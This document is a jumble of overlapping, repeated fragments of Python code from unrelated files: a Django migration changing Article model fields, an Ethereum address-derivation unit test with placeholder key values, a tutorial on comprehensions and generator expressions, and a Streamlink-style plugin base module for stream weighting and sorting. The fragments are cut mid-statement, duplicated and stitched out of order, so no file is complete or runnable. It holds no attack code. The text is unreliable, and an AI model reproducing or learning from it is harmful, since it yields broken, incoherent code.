model_name='article',", "name='fly_title', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='headline', field=models.TextField(blank=True, null=True), ),", "model_name='article', name='source', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='source_url', field=models.URLField(editable=False), ),", "model_name='article', name='source_url', field=models.URLField(editable=False), ), migrations.AlterField( model_name='article', name='spider', field=models.TextField(editable=False), ), ]", "dependencies = [ ('economist', '0002_auto_20170406_1153'), ] operations = [ migrations.AlterField(", "2017-04-06 06:02 from __future__ import unicode_literals from django.db import migrations,", "), migrations.AlterField( model_name='article', name='fly_title', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='headline',", "'0002_auto_20170406_1153'), ] operations = [ migrations.AlterField( model_name='article', name='alternativename', field=models.TextField(blank=True, null=True),", "field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='fly_title', field=models.TextField(blank=True, null=True), ), migrations.AlterField(", "null=True), ), migrations.AlterField( model_name='article', name='project', field=models.TextField(editable=False), ), migrations.AlterField( model_name='article', name='source',", "1.10.6 on 2017-04-06 06:02 from __future__ import unicode_literals from django.db", "import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies", "field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='project', field=models.TextField(editable=False), ), migrations.AlterField( model_name='article',", "name='alternativename', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='category', field=models.TextField(blank=True, null=True), ),", "on 2017-04-06 06:02 from __future__ import unicode_literals from django.db import", "by Django 1.10.6 on 2017-04-06 06:02 from __future__ import unicode_literals", "class Migration(migrations.Migration): dependencies = [ ('economist', '0002_auto_20170406_1153'), ] operations =", "# Generated by Django 1.10.6 on 2017-04-06 06:02 from __future__", "= [ ('economist', '0002_auto_20170406_1153'), ] operations = [ migrations.AlterField( model_name='article',", "name='source', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='source_url', field=models.URLField(editable=False), ), migrations.AlterField(", "field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='category', field=models.TextField(blank=True, null=True), ), migrations.AlterField(", "), migrations.AlterField( model_name='article', name='headline', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='project',", "-*- coding: utf-8 -*- # Generated by Django 1.10.6 on", "from __future__ import unicode_literals from django.db import migrations, models class", "__future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration):", "null=True), ), migrations.AlterField( model_name='article', name='fly_title', field=models.TextField(blank=True, null=True), ), migrations.AlterField( 
model_name='article',", "migrations.AlterField( model_name='article', name='fly_title', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='headline', field=models.TextField(blank=True," ]
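For reference, a sketch of the Article model state these AlterField operations converge on; this is reconstructed for illustration, not copied from economist/models.py, which may define additional fields or options:

from django.db import models


class Article(models.Model):
    alternativename = models.TextField(blank=True, null=True)
    category = models.TextField(blank=True, null=True)
    fly_title = models.TextField(blank=True, null=True)
    headline = models.TextField(blank=True, null=True)
    project = models.TextField(editable=False)
    source = models.TextField(blank=True, null=True)
    source_url = models.URLField(editable=False)
    spider = models.TextField(editable=False)

Applying the migration is the usual python manage.py migrate economist.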
[ "(\"0258cdabe1dad468dda6a7d62bee9e0cddadfe87d664e62df9143e769c017dd651\", \"0xaA5EacE5be0D09B09BAf66df62b0D85EA20b4ee4\"), (\"<KEY>\", \"<KEY>\")] def test_address_testvector(self): for publickey_hex, address_expected in", "conversion from private key to wif\"\"\" def setUp(self): self.test_add_vector =", "(\"<KEY>\", \"<KEY>\"), (\"<KEY>\", \"<KEY>\"), (\"037049004c5ad576beb518dcc74506df3faf520109a489886b7d1435a63b9b0b88\", \"0x0af4DbEf58063AEd75e6fF57610348E55954E8FB\"), (\"0260bbacc03555af21f062ff04e9fbde36bcf0ae7396812d336e7f2e5292306f2b\", \"<KEY>\"), (\"0343710601de0710dd81a0b7102bf1b794809a330caf4e1b4ae6567923c00df6a5\", \"<KEY>\"),", "publickey_hex, address_expected in self.test_add_vector: publickey = bytearray.fromhex(publickey_hex) address = address_from_publickey_ethereum(publickey)", "setUp(self): self.test_add_vector = [(\"03cb3e5f30245658e1e3615f1620e5b40f7d9016c0edb3611dd786327dd5e40caa\", \"<KEY>\"), (\"<KEY>\", \"0xDB1F8a8B668F15B9e696dDfF30Ce233703f9eC97\"), (\"<KEY>\", \"<KEY>\"), (\"<KEY>\",", "wif_export_bitcoin, compute_public_key_sec256k1, address_from_publickey_ethereum class TestEthereum(unittest.TestCase): \"\"\"test of the bitcoin conversion", "from private key to wif\"\"\" def setUp(self): self.test_add_vector = [(\"03cb3e5f30245658e1e3615f1620e5b40f7d9016c0edb3611dd786327dd5e40caa\",", "\"0x0af4DbEf58063AEd75e6fF57610348E55954E8FB\"), (\"0260bbacc03555af21f062ff04e9fbde36bcf0ae7396812d336e7f2e5292306f2b\", \"<KEY>\"), (\"0343710601de0710dd81a0b7102bf1b794809a330caf4e1b4ae6567923c00df6a5\", \"<KEY>\"), (\"028c48ff458287f34cc1ad5c58a441500f8f315e9cabe34ff1601a5a0f791e4d0a\", \"0x98447B7aC721BDeb197a7e72780f6f41BECA2919\"), (\"0258cdabe1dad468dda6a7d62bee9e0cddadfe87d664e62df9143e769c017dd651\", \"0xaA5EacE5be0D09B09BAf66df62b0D85EA20b4ee4\"), (\"<KEY>\",", "from coinplus_solo_redeem.common import wif_export_bitcoin, compute_public_key_sec256k1, address_from_publickey_ethereum class TestEthereum(unittest.TestCase): \"\"\"test of", "def test_address_testvector(self): for publickey_hex, address_expected in self.test_add_vector: publickey = bytearray.fromhex(publickey_hex)", "address_expected in self.test_add_vector: publickey = bytearray.fromhex(publickey_hex) address = address_from_publickey_ethereum(publickey) self.assertEqual(address,", "\"<KEY>\"), (\"<KEY>\", \"<KEY>\"), (\"037049004c5ad576beb518dcc74506df3faf520109a489886b7d1435a63b9b0b88\", \"0x0af4DbEf58063AEd75e6fF57610348E55954E8FB\"), (\"0260bbacc03555af21f062ff04e9fbde36bcf0ae7396812d336e7f2e5292306f2b\", \"<KEY>\"), (\"0343710601de0710dd81a0b7102bf1b794809a330caf4e1b4ae6567923c00df6a5\", \"<KEY>\"), (\"028c48ff458287f34cc1ad5c58a441500f8f315e9cabe34ff1601a5a0f791e4d0a\",", "\"<KEY>\"), (\"<KEY>\", \"0xDB1F8a8B668F15B9e696dDfF30Ce233703f9eC97\"), (\"<KEY>\", \"<KEY>\"), (\"<KEY>\", \"<KEY>\"), (\"037049004c5ad576beb518dcc74506df3faf520109a489886b7d1435a63b9b0b88\", \"0x0af4DbEf58063AEd75e6fF57610348E55954E8FB\"), (\"0260bbacc03555af21f062ff04e9fbde36bcf0ae7396812d336e7f2e5292306f2b\",", "to wif\"\"\" def setUp(self): self.test_add_vector = [(\"03cb3e5f30245658e1e3615f1620e5b40f7d9016c0edb3611dd786327dd5e40caa\", \"<KEY>\"), (\"<KEY>\", \"0xDB1F8a8B668F15B9e696dDfF30Ce233703f9eC97\"),", "unittest from coinplus_solo_redeem.common import wif_export_bitcoin, compute_public_key_sec256k1, address_from_publickey_ethereum class TestEthereum(unittest.TestCase): \"\"\"test", "[(\"03cb3e5f30245658e1e3615f1620e5b40f7d9016c0edb3611dd786327dd5e40caa\", \"<KEY>\"), (\"<KEY>\", 
\"0xDB1F8a8B668F15B9e696dDfF30Ce233703f9eC97\"), (\"<KEY>\", \"<KEY>\"), (\"<KEY>\", \"<KEY>\"), (\"037049004c5ad576beb518dcc74506df3faf520109a489886b7d1435a63b9b0b88\", \"0x0af4DbEf58063AEd75e6fF57610348E55954E8FB\"),", "def setUp(self): self.test_add_vector = [(\"03cb3e5f30245658e1e3615f1620e5b40f7d9016c0edb3611dd786327dd5e40caa\", \"<KEY>\"), (\"<KEY>\", \"0xDB1F8a8B668F15B9e696dDfF30Ce233703f9eC97\"), (\"<KEY>\", \"<KEY>\"),", "coinplus_solo_redeem.common import wif_export_bitcoin, compute_public_key_sec256k1, address_from_publickey_ethereum class TestEthereum(unittest.TestCase): \"\"\"test of the", "bitcoin conversion from private key to wif\"\"\" def setUp(self): self.test_add_vector", "= [(\"03cb3e5f30245658e1e3615f1620e5b40f7d9016c0edb3611dd786327dd5e40caa\", \"<KEY>\"), (\"<KEY>\", \"0xDB1F8a8B668F15B9e696dDfF30Ce233703f9eC97\"), (\"<KEY>\", \"<KEY>\"), (\"<KEY>\", \"<KEY>\"), (\"037049004c5ad576beb518dcc74506df3faf520109a489886b7d1435a63b9b0b88\",", "address_from_publickey_ethereum class TestEthereum(unittest.TestCase): \"\"\"test of the bitcoin conversion from private", "\"<KEY>\"), (\"028c48ff458287f34cc1ad5c58a441500f8f315e9cabe34ff1601a5a0f791e4d0a\", \"0x98447B7aC721BDeb197a7e72780f6f41BECA2919\"), (\"0258cdabe1dad468dda6a7d62bee9e0cddadfe87d664e62df9143e769c017dd651\", \"0xaA5EacE5be0D09B09BAf66df62b0D85EA20b4ee4\"), (\"<KEY>\", \"<KEY>\")] def test_address_testvector(self): for", "(\"<KEY>\", \"0xDB1F8a8B668F15B9e696dDfF30Ce233703f9eC97\"), (\"<KEY>\", \"<KEY>\"), (\"<KEY>\", \"<KEY>\"), (\"037049004c5ad576beb518dcc74506df3faf520109a489886b7d1435a63b9b0b88\", \"0x0af4DbEf58063AEd75e6fF57610348E55954E8FB\"), (\"0260bbacc03555af21f062ff04e9fbde36bcf0ae7396812d336e7f2e5292306f2b\", \"<KEY>\"),", "\"0xDB1F8a8B668F15B9e696dDfF30Ce233703f9eC97\"), (\"<KEY>\", \"<KEY>\"), (\"<KEY>\", \"<KEY>\"), (\"037049004c5ad576beb518dcc74506df3faf520109a489886b7d1435a63b9b0b88\", \"0x0af4DbEf58063AEd75e6fF57610348E55954E8FB\"), (\"0260bbacc03555af21f062ff04e9fbde36bcf0ae7396812d336e7f2e5292306f2b\", \"<KEY>\"), (\"0343710601de0710dd81a0b7102bf1b794809a330caf4e1b4ae6567923c00df6a5\",", "(\"<KEY>\", \"<KEY>\")] def test_address_testvector(self): for publickey_hex, address_expected in self.test_add_vector: publickey", "import unittest from coinplus_solo_redeem.common import wif_export_bitcoin, compute_public_key_sec256k1, address_from_publickey_ethereum class TestEthereum(unittest.TestCase):", "import wif_export_bitcoin, compute_public_key_sec256k1, address_from_publickey_ethereum class TestEthereum(unittest.TestCase): \"\"\"test of the bitcoin", "\"0x98447B7aC721BDeb197a7e72780f6f41BECA2919\"), (\"0258cdabe1dad468dda6a7d62bee9e0cddadfe87d664e62df9143e769c017dd651\", \"0xaA5EacE5be0D09B09BAf66df62b0D85EA20b4ee4\"), (\"<KEY>\", \"<KEY>\")] def test_address_testvector(self): for publickey_hex, address_expected", "self.test_add_vector = [(\"03cb3e5f30245658e1e3615f1620e5b40f7d9016c0edb3611dd786327dd5e40caa\", \"<KEY>\"), (\"<KEY>\", \"0xDB1F8a8B668F15B9e696dDfF30Ce233703f9eC97\"), (\"<KEY>\", \"<KEY>\"), (\"<KEY>\", \"<KEY>\"),", "in self.test_add_vector: publickey = bytearray.fromhex(publickey_hex) address = address_from_publickey_ethereum(publickey) self.assertEqual(address, address_expected)", "class TestEthereum(unittest.TestCase): \"\"\"test of the bitcoin conversion from private key", "TestEthereum(unittest.TestCase): \"\"\"test of the bitcoin conversion from private key to", "for publickey_hex, address_expected in self.test_add_vector: publickey = bytearray.fromhex(publickey_hex) address =", 
"(\"<KEY>\", \"<KEY>\"), (\"037049004c5ad576beb518dcc74506df3faf520109a489886b7d1435a63b9b0b88\", \"0x0af4DbEf58063AEd75e6fF57610348E55954E8FB\"), (\"0260bbacc03555af21f062ff04e9fbde36bcf0ae7396812d336e7f2e5292306f2b\", \"<KEY>\"), (\"0343710601de0710dd81a0b7102bf1b794809a330caf4e1b4ae6567923c00df6a5\", \"<KEY>\"), (\"028c48ff458287f34cc1ad5c58a441500f8f315e9cabe34ff1601a5a0f791e4d0a\", \"0x98447B7aC721BDeb197a7e72780f6f41BECA2919\"),", "\"<KEY>\"), (\"0343710601de0710dd81a0b7102bf1b794809a330caf4e1b4ae6567923c00df6a5\", \"<KEY>\"), (\"028c48ff458287f34cc1ad5c58a441500f8f315e9cabe34ff1601a5a0f791e4d0a\", \"0x98447B7aC721BDeb197a7e72780f6f41BECA2919\"), (\"0258cdabe1dad468dda6a7d62bee9e0cddadfe87d664e62df9143e769c017dd651\", \"0xaA5EacE5be0D09B09BAf66df62b0D85EA20b4ee4\"), (\"<KEY>\", \"<KEY>\")] def", "(\"0260bbacc03555af21f062ff04e9fbde36bcf0ae7396812d336e7f2e5292306f2b\", \"<KEY>\"), (\"0343710601de0710dd81a0b7102bf1b794809a330caf4e1b4ae6567923c00df6a5\", \"<KEY>\"), (\"028c48ff458287f34cc1ad5c58a441500f8f315e9cabe34ff1601a5a0f791e4d0a\", \"0x98447B7aC721BDeb197a7e72780f6f41BECA2919\"), (\"0258cdabe1dad468dda6a7d62bee9e0cddadfe87d664e62df9143e769c017dd651\", \"0xaA5EacE5be0D09B09BAf66df62b0D85EA20b4ee4\"), (\"<KEY>\", \"<KEY>\")]", "private key to wif\"\"\" def setUp(self): self.test_add_vector = [(\"03cb3e5f30245658e1e3615f1620e5b40f7d9016c0edb3611dd786327dd5e40caa\", \"<KEY>\"),", "of the bitcoin conversion from private key to wif\"\"\" def", "(\"0343710601de0710dd81a0b7102bf1b794809a330caf4e1b4ae6567923c00df6a5\", \"<KEY>\"), (\"028c48ff458287f34cc1ad5c58a441500f8f315e9cabe34ff1601a5a0f791e4d0a\", \"0x98447B7aC721BDeb197a7e72780f6f41BECA2919\"), (\"0258cdabe1dad468dda6a7d62bee9e0cddadfe87d664e62df9143e769c017dd651\", \"0xaA5EacE5be0D09B09BAf66df62b0D85EA20b4ee4\"), (\"<KEY>\", \"<KEY>\")] def test_address_testvector(self):", "(\"037049004c5ad576beb518dcc74506df3faf520109a489886b7d1435a63b9b0b88\", \"0x0af4DbEf58063AEd75e6fF57610348E55954E8FB\"), (\"0260bbacc03555af21f062ff04e9fbde36bcf0ae7396812d336e7f2e5292306f2b\", \"<KEY>\"), (\"0343710601de0710dd81a0b7102bf1b794809a330caf4e1b4ae6567923c00df6a5\", \"<KEY>\"), (\"028c48ff458287f34cc1ad5c58a441500f8f315e9cabe34ff1601a5a0f791e4d0a\", \"0x98447B7aC721BDeb197a7e72780f6f41BECA2919\"), (\"0258cdabe1dad468dda6a7d62bee9e0cddadfe87d664e62df9143e769c017dd651\", \"0xaA5EacE5be0D09B09BAf66df62b0D85EA20b4ee4\"),", "the bitcoin conversion from private key to wif\"\"\" def setUp(self):", "wif\"\"\" def setUp(self): self.test_add_vector = [(\"03cb3e5f30245658e1e3615f1620e5b40f7d9016c0edb3611dd786327dd5e40caa\", \"<KEY>\"), (\"<KEY>\", \"0xDB1F8a8B668F15B9e696dDfF30Ce233703f9eC97\"), (\"<KEY>\",", "\"<KEY>\")] def test_address_testvector(self): for publickey_hex, address_expected in self.test_add_vector: publickey =", "\"0xaA5EacE5be0D09B09BAf66df62b0D85EA20b4ee4\"), (\"<KEY>\", \"<KEY>\")] def test_address_testvector(self): for publickey_hex, address_expected in self.test_add_vector:", "\"\"\"test of the bitcoin conversion from private key to wif\"\"\"", "key to wif\"\"\" def setUp(self): self.test_add_vector = [(\"03cb3e5f30245658e1e3615f1620e5b40f7d9016c0edb3611dd786327dd5e40caa\", \"<KEY>\"), (\"<KEY>\",", "test_address_testvector(self): for publickey_hex, address_expected in self.test_add_vector: publickey = bytearray.fromhex(publickey_hex) address", "\"<KEY>\"), (\"037049004c5ad576beb518dcc74506df3faf520109a489886b7d1435a63b9b0b88\", \"0x0af4DbEf58063AEd75e6fF57610348E55954E8FB\"), 
(\"0260bbacc03555af21f062ff04e9fbde36bcf0ae7396812d336e7f2e5292306f2b\", \"<KEY>\"), (\"0343710601de0710dd81a0b7102bf1b794809a330caf4e1b4ae6567923c00df6a5\", \"<KEY>\"), (\"028c48ff458287f34cc1ad5c58a441500f8f315e9cabe34ff1601a5a0f791e4d0a\", \"0x98447B7aC721BDeb197a7e72780f6f41BECA2919\"), (\"0258cdabe1dad468dda6a7d62bee9e0cddadfe87d664e62df9143e769c017dd651\",", "compute_public_key_sec256k1, address_from_publickey_ethereum class TestEthereum(unittest.TestCase): \"\"\"test of the bitcoin conversion from", "(\"028c48ff458287f34cc1ad5c58a441500f8f315e9cabe34ff1601a5a0f791e4d0a\", \"0x98447B7aC721BDeb197a7e72780f6f41BECA2919\"), (\"0258cdabe1dad468dda6a7d62bee9e0cddadfe87d664e62df9143e769c017dd651\", \"0xaA5EacE5be0D09B09BAf66df62b0D85EA20b4ee4\"), (\"<KEY>\", \"<KEY>\")] def test_address_testvector(self): for publickey_hex," ]
[ "# print(odd_list) # 2. 逻辑复杂的情况 如果是奇数将结果平方 # 列表生成式性能高于列表操作 def handle_item(item):", "set(my_dict.keys()) my_set = {key for key, value in my_dict.items()} print(type(my_set))", "\"bobby2\": 23, \"imooc.com\": 5} reversed_dict = {value:key for key, value", "my_set = set(my_dict.keys()) my_set = {key for key, value in", "1] print(odd_list) # 生成器表达式 odd_gen = (i for i in", "for i in range(21): # if i % 2 ==", "print(odd_list) # 2. 逻辑复杂的情况 如果是奇数将结果平方 # 列表生成式性能高于列表操作 def handle_item(item): return", "== 1] # print(odd_list) # 2. 逻辑复杂的情况 如果是奇数将结果平方 # 列表生成式性能高于列表操作", "range(21): # if i % 2 == 1: # odd_list.append(i)", "i % 2 == 1] # print(odd_list) # 2. 逻辑复杂的情况", "# odd_list.append(i) # odd_list = [i for i in range(21)", "odd_gen = (i for i in range(21) if i %", "字典推导式 my_dict = {\"bobby1\": 22, \"bobby2\": 23, \"imooc.com\": 5} reversed_dict", "in range(21) if i % 2 == 1] # print(odd_list)", "= {\"bobby1\": 22, \"bobby2\": 23, \"imooc.com\": 5} reversed_dict = {value:key", "# 2. 逻辑复杂的情况 如果是奇数将结果平方 # 列表生成式性能高于列表操作 def handle_item(item): return item", "集合推导式 my_set = set(my_dict.keys()) my_set = {key for key, value", "= set(my_dict.keys()) my_set = {key for key, value in my_dict.items()}", "i in range(21) if i % 2 == 1] print(odd_list)", "% 2 == 1: # odd_list.append(i) # odd_list = [i", "in range(21) if i % 2 == 1) print(type(odd_gen)) for", "= (i for i in range(21) if i % 2", "i % 2 == 1) print(type(odd_gen)) for item in odd_gen:", "% 2 == 1) print(type(odd_gen)) for item in odd_gen: print(item)", "# 列表生成式(列表推导式) # 1. 提取出1-20之间的奇数 # odd_list = [] #", "= [handle_item(i) for i in range(21) if i % 2", "if i % 2 == 1] # print(odd_list) # 2.", "odd_list.append(i) # odd_list = [i for i in range(21) if", "# odd_list = [] # for i in range(21): #", "生成器表达式 odd_gen = (i for i in range(21) if i", "列表生成式(列表推导式) # 1. 提取出1-20之间的奇数 # odd_list = [] # for", "* item odd_list = [handle_item(i) for i in range(21) if", "my_dict.items()} print(reversed_dict) # 集合推导式 my_set = set(my_dict.keys()) my_set = {key", "1: # odd_list.append(i) # odd_list = [i for i in", "in range(21) if i % 2 == 1] print(odd_list) #", "i % 2 == 1: # odd_list.append(i) # odd_list =", "i in range(21) if i % 2 == 1] #", "# if i % 2 == 1: # odd_list.append(i) #", "[handle_item(i) for i in range(21) if i % 2 ==", "for i in range(21) if i % 2 == 1]", "for item in odd_gen: print(item) # 字典推导式 my_dict = {\"bobby1\":", "23, \"imooc.com\": 5} reversed_dict = {value:key for key, value in", "value in my_dict.items()} print(reversed_dict) # 集合推导式 my_set = set(my_dict.keys()) my_set", "item in odd_gen: print(item) # 字典推导式 my_dict = {\"bobby1\": 22,", "\"imooc.com\": 5} reversed_dict = {value:key for key, value in my_dict.items()}", "i in range(21): # if i % 2 == 1:", "2. 
逻辑复杂的情况 如果是奇数将结果平方 # 列表生成式性能高于列表操作 def handle_item(item): return item *", "reversed_dict = {value:key for key, value in my_dict.items()} print(reversed_dict) #", "i in range(21) if i % 2 == 1) print(type(odd_gen))", "odd_list = [i for i in range(21) if i %", "print(type(odd_gen)) for item in odd_gen: print(item) # 字典推导式 my_dict =", "range(21) if i % 2 == 1) print(type(odd_gen)) for item", "= [i for i in range(21) if i % 2", "in range(21): # if i % 2 == 1: #", "# 生成器表达式 odd_gen = (i for i in range(21) if", "key, value in my_dict.items()} print(reversed_dict) # 集合推导式 my_set = set(my_dict.keys())", "{value:key for key, value in my_dict.items()} print(reversed_dict) # 集合推导式 my_set", "print(reversed_dict) # 集合推导式 my_set = set(my_dict.keys()) my_set = {key for", "range(21) if i % 2 == 1] print(odd_list) # 生成器表达式", "# odd_list = [i for i in range(21) if i", "1. 提取出1-20之间的奇数 # odd_list = [] # for i in", "# for i in range(21): # if i % 2", "my_dict = {\"bobby1\": 22, \"bobby2\": 23, \"imooc.com\": 5} reversed_dict =", "逻辑复杂的情况 如果是奇数将结果平方 # 列表生成式性能高于列表操作 def handle_item(item): return item * item", "2 == 1] # print(odd_list) # 2. 逻辑复杂的情况 如果是奇数将结果平方 #", "for key, value in my_dict.items()} print(reversed_dict) # 集合推导式 my_set =", "i % 2 == 1] print(odd_list) # 生成器表达式 odd_gen =", "#!usr/bin/python # -*- coding:utf8 -*- # 列表生成式(列表推导式) # 1. 提取出1-20之间的奇数", "odd_list = [] # for i in range(21): # if", "handle_item(item): return item * item odd_list = [handle_item(i) for i", "% 2 == 1] print(odd_list) # 生成器表达式 odd_gen = (i", "# 集合推导式 my_set = set(my_dict.keys()) my_set = {key for key,", "odd_gen: print(item) # 字典推导式 my_dict = {\"bobby1\": 22, \"bobby2\": 23,", "== 1: # odd_list.append(i) # odd_list = [i for i", "in my_dict.items()} print(reversed_dict) # 集合推导式 my_set = set(my_dict.keys()) my_set =", "1) print(type(odd_gen)) for item in odd_gen: print(item) # 字典推导式 my_dict", "print(odd_list) # 生成器表达式 odd_gen = (i for i in range(21)", "5} reversed_dict = {value:key for key, value in my_dict.items()} print(reversed_dict)", "def handle_item(item): return item * item odd_list = [handle_item(i) for", "[i for i in range(21) if i % 2 ==", "= {value:key for key, value in my_dict.items()} print(reversed_dict) # 集合推导式", "2 == 1] print(odd_list) # 生成器表达式 odd_gen = (i for", "# 1. 提取出1-20之间的奇数 # odd_list = [] # for i", "print(item) # 字典推导式 my_dict = {\"bobby1\": 22, \"bobby2\": 23, \"imooc.com\":", "== 1] print(odd_list) # 生成器表达式 odd_gen = (i for i", "if i % 2 == 1) print(type(odd_gen)) for item in", "# -*- coding:utf8 -*- # 列表生成式(列表推导式) # 1. 提取出1-20之间的奇数 #", "% 2 == 1] # print(odd_list) # 2. 逻辑复杂的情况 如果是奇数将结果平方", "1] # print(odd_list) # 2. 逻辑复杂的情况 如果是奇数将结果平方 # 列表生成式性能高于列表操作 def", "return item * item odd_list = [handle_item(i) for i in", "in odd_gen: print(item) # 字典推导式 my_dict = {\"bobby1\": 22, \"bobby2\":", "coding:utf8 -*- # 列表生成式(列表推导式) # 1. 
提取出1-20之间的奇数 # odd_list =", "(i for i in range(21) if i % 2 ==", "item odd_list = [handle_item(i) for i in range(21) if i", "if i % 2 == 1] print(odd_list) # 生成器表达式 odd_gen", "== 1) print(type(odd_gen)) for item in odd_gen: print(item) # 字典推导式", "[] # for i in range(21): # if i %", "# 列表生成式性能高于列表操作 def handle_item(item): return item * item odd_list =", "{\"bobby1\": 22, \"bobby2\": 23, \"imooc.com\": 5} reversed_dict = {value:key for", "22, \"bobby2\": 23, \"imooc.com\": 5} reversed_dict = {value:key for key,", "# 字典推导式 my_dict = {\"bobby1\": 22, \"bobby2\": 23, \"imooc.com\": 5}", "item * item odd_list = [handle_item(i) for i in range(21)", "for i in range(21) if i % 2 == 1)", "range(21) if i % 2 == 1] # print(odd_list) #", "列表生成式性能高于列表操作 def handle_item(item): return item * item odd_list = [handle_item(i)", "2 == 1: # odd_list.append(i) # odd_list = [i for", "-*- # 列表生成式(列表推导式) # 1. 提取出1-20之间的奇数 # odd_list = []", "if i % 2 == 1: # odd_list.append(i) # odd_list", "-*- coding:utf8 -*- # 列表生成式(列表推导式) # 1. 提取出1-20之间的奇数 # odd_list", "提取出1-20之间的奇数 # odd_list = [] # for i in range(21):", "2 == 1) print(type(odd_gen)) for item in odd_gen: print(item) #", "= [] # for i in range(21): # if i", "如果是奇数将结果平方 # 列表生成式性能高于列表操作 def handle_item(item): return item * item odd_list", "odd_list = [handle_item(i) for i in range(21) if i %" ]
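A quick, machine-dependent way to back up the performance claim above (timings are illustrative and not from the original file):

import timeit

loop = "r = []\nfor i in range(1000):\n    if i % 2 == 1:\n        r.append(i)"
comp = "r = [i for i in range(1000) if i % 2 == 1]"

# The comprehension avoids repeated attribute lookup and method calls on
# r.append, so it usually comes out measurably faster.
print(timeit.timeit(loop, number=10000))
print(timeit.timeit(comp, number=10000))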
[ "Plugin(object): \"\"\"A plugin can retrieve stream information from the URL", "url): self.url = url @classmethod def can_handle_url(cls, url): raise NotImplementedError", "op, value = match.group(\"op\", \"value\") op = FILTER_OPERATORS.get(op, operator.eq) filter_weight,", "version 1.9.0. Has been renamed to :func:`Plugin.streams`, this is an", "can_handle_url(cls, url): raise NotImplementedError @classmethod def set_option(cls, key, value): cls.options.set(key,", "backwards compatibility. \"\"\" return self.streams(*args, **kwargs) def _get_streams(self): raise NotImplementedError", "if stream in weights: return weights[stream], group match = re.match(r\"^(\\d+)(k|p)?(\\d+)?(\\+)?(?:_(\\d+)k)?(?:_(alt)(\\d)?)?$\",", "streams.keys()))) # We shouldn't need more than 2 alt streams", ":class:`Stream` object. The result can contain the synonyms **best** and", "streams with the same name are found, the order of", "knows math, please fix. BIT_RATE_WEIGHT_RATIO = 2.8 ALT_WEIGHT_MOD = 0.01", "expressions or a function that is passed to filter(). \"\"\"", "can be fine tuned with the *sorting_excludes* parameter. This can", "name = \"{0}{1}\".format(name, num_alts + 1) # Validate stream name", "match other stream types if \"*\" not in stream_types and", "= 20 LOW_PRIORITY = 10 NO_PRIORITY = 0 def stream_weight(stream):", "match = re.match(r\"(?P<op><=|>=|<|>)?(?P<value>[\\w+]+)\", expr) if not match: raise PluginError(\"Invalid filter", "num_alts = len(list(filter(lambda n: n.startswith(name), streams.keys()))) # We shouldn't need", "session = None @classmethod def bind(cls, session, module): cls.cache =", "num_alts > 0: name = \"{0}{1}\".format(name, num_alts + 1) #", "import Cache from ..exceptions import PluginError, NoStreamsError from ..options import", "(name, stream) def stream_type_priority(stream_types, stream): stream_type = type(stream[1]).shortname() try: prio", "which streams to exclude from the best/worst synonyms. .. versionchanged::", "# bit rate classifier for resolution weight += int(match.group(5)) /", "= url.split(\" \", 1) url = split[0] params = split[1]", "by default it returns NORMAL priority. :return: priority level \"\"\"", "extract available streams. Returns a :class:`dict` containing the streams, where", "be a list of filter expressions or a function that", "We shouldn't need more than 2 alt streams if num_alts", "bitrate / BIT_RATE_WEIGHT_RATIO return weight, \"bitrate\" elif name_type == \"p\":", "not op(weight, filter_weight) return True return func def parse_url_params(url): split", "streams.keys()) sorted_streams = sorted(stream_names, key=stream_weight_only) if isinstance(sorting_excludes, list): for expr", "object. The result can contain the synonyms **best** and **worst**", "of a resolution. # Someone who knows math, please fix.", "stream_types and stream_type not in stream_types: continue # drop _alt", "sorting_excludes=None): \"\"\"Attempts to extract available streams. Returns a :class:`dict` containing", "or a function that is passed to filter(). \"\"\" try:", "the name while the rest will be renamed to \"<name>_<stream", "synonyms can be fine tuned with the *sorting_excludes* parameter. This", "# Create the best/worst synonmys def stream_weight_only(s): return (self.stream_weight(s)[0] or", "weight, group = stream_weight(quality) if group == filter_group: return not", "exclude from the best/worst synonyms. .. 
versionchanged:: 1.4.2 Added *priority*", "BIT_RATE_WEIGHT_RATIO return weight, \"pixels\" return 0, \"none\" def iterate_streams(streams): for", "FILTER_OPERATORS = { \"<\": operator.lt, \"<=\": operator.le, \">\": operator.gt, \">=\":", "= Options() session = None @classmethod def bind(cls, session, module):", "ValueError) as err: raise PluginError(err) if not ostreams: return {}", "list(ostreams) except NoStreamsError: return {} except (IOError, OSError, ValueError) as", "stream in streams: if isinstance(stream, list): for sub_stream in stream:", "\" \"changes to the service preventing a working implementation. \"", "types if \"*\" not in stream_types and stream_type not in", "This is likely due to \" \"changes to the service", "a function that is passed to filter(). \"\"\" try: ostreams", "to the service preventing a working implementation. \" ) if", "sorted(stream_names, key=stream_weight_only) if isinstance(sorting_excludes, list): for expr in sorting_excludes: filter_func", "rval = {} matches = re.findall(PARAMS_REGEX, params) for key, value", "HIGH_PRIORITY = 30 NORMAL_PRIORITY = 20 LOW_PRIORITY = 10 NO_PRIORITY", "def get_option(cls, key): return cls.options.get(key) @classmethod def stream_weight(cls, stream): return", "int(match.group(5)) / BIT_RATE_WEIGHT_RATIO return weight, \"pixels\" return 0, \"none\" def", "= split[1] if len(split) > 1 else '' return url,", "99 return prio def stream_sorting_filter(expr, stream_weight): match = re.match(r\"(?P<op><=|>=|<|>)?(?P<value>[\\w+]+)\", expr)", "\"+\": weight += 1 if match.group(5): # bit rate classifier", "stream in weights: return weights[stream], group match = re.match(r\"^(\\d+)(k|p)?(\\d+)?(\\+)?(?:_(\\d+)k)?(?:_(alt)(\\d)?)?$\", stream)", "to be of highest and lowest quality respectively. If multiple", "a list of filter expressions or a function that is", "exclude streams ranked higher than \"480p\" from the list used", "making a bitrate's # weight end up similar to the", "LOW_PRIORITY = 10 NO_PRIORITY = 0 def stream_weight(stream): for group,", "stream types if \"*\" not in stream_types and stream_type not", "= re.match(r\"(?P<op><=|>=|<|>)?(?P<value>[\\w+]+)\", expr) if not match: raise PluginError(\"Invalid filter expression:", "\"<name>_<stream type>\". The synonyms can be fine tuned with the", "weights in 